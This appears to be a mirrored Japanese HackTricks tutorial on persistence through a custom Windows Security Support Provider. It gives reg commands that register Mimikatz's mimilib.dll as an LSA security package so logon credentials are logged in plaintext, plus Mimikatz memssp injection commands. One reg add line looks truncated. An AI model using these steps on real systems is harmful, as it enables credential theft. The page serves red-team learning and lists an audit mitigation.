mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-29 08:01:00 +00:00
4.4 KiB
4.4 KiB
Custom SSP
htARTE(HackTricks AWS Red Team Expert) htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したいまたはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
- ハッキングトリックを共有するには、HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出してください。
カスタムSSP
ここでSSP(セキュリティサポートプロバイダ)とは何かを学びます。
マシンへのアクセスに使用される資格情報を平文でキャプチャするために、独自のSSPを作成できます。
Mimilib
Mimikatzによって提供されるmimilib.dll
バイナリを使用できます。これにより、すべての資格情報が平文でファイルに記録されます。
dllをC:\Windows\System32\
に配置します。
既存のLSAセキュリティパッケージのリストを取得します:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
セキュリティ サポート プロバイダ リスト (セキュリティ パッケージ) に mimilib.dll
を追加します:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
リブート後、すべての資格情報はC:\Windows\System32\kiwissp.log
内で平文で見つけることができます。
メモリ内
また、Mimikatzを使用してこれを直接メモリにインジェクトすることもできます(注意:少し不安定で動作しない可能性があります)。
privilege::debug
misc::memssp
これは再起動を乗り越えられません。
緩和策
イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
の作成/変更の監査
htARTE(HackTricks AWS Red Team Expert) でゼロからヒーローまでAWSハッキングを学ぶ!
HackTricks をサポートする他の方法:
- HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください!
- 公式PEASS&HackTricksスウォッグを入手する
- The PEASS Family を発見し、独占的な NFTs のコレクションを見つける
- **💬 Discordグループ または telegramグループ に参加するか、Twitter 🐦 @carlospolopm をフォローする。
- ハッキングトリックを共有するには、 HackTricks と HackTricks Cloud のGitHubリポジトリにPRを提出してください。